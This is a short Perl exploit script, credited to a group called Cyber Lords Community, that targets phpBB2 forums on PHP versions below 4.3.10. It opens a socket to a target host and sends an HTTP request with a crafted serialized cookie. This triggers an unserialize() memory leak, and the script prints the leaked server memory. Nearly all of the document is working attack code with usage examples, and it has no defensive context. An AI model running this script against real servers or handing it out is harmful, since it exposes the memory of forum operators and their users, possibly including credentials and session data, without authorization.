#!/usr/bin/perl

#
# Simple phpbb2 + php version < 4.3.10 unserialize() memory dump sql sploit
# Based on http://www.securitylab.ru/_Exploits/2004/12/phpbb+php.c.txt

# (c) Cyber Lords Community http://www.cyberlords.net

# Usage: perl spl.pl host phpbb_dir

# Example:  ./spl.pl forum.ru /phpbb/
# Example#2: /spl.pl forum.ru /phpbb/ | strings | awk -F"\n" 'BEGIN{s=0}{s=s+1;printf "string %i:    %s\n",s,$1}'
#
#

use Socket;
use IO::Handle;

my $host=@ARGV[0];
my $dir=@ARGV[1];

socket(SOCK,AF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "socket() failed: $!\n";
connect(SOCK,sockaddr_in(80,inet_aton($host)));
SOCK->autoflush(1);

my $q=qq{GET $dir HTTP/1.1
HOST: $host
Cookie: phpbb2mysql_data=s:400000:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT;
Cookie: phpbb2mysql_sid=1cfd759c33ba3a45b994c7b7cfd948ec; path=/;
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

};

print SOCK $q;

my $all_data,$data,$s;

while(sysread(SOCK,$data,1024)){
$all_data.=$data;
}

while($all_data=~/\%([A-Z0-9]{2})/) {
     $s=pack('H8', $1);
     $all_data=~s/\%$1/$s/g;
}

print $all_data;
close SOCK;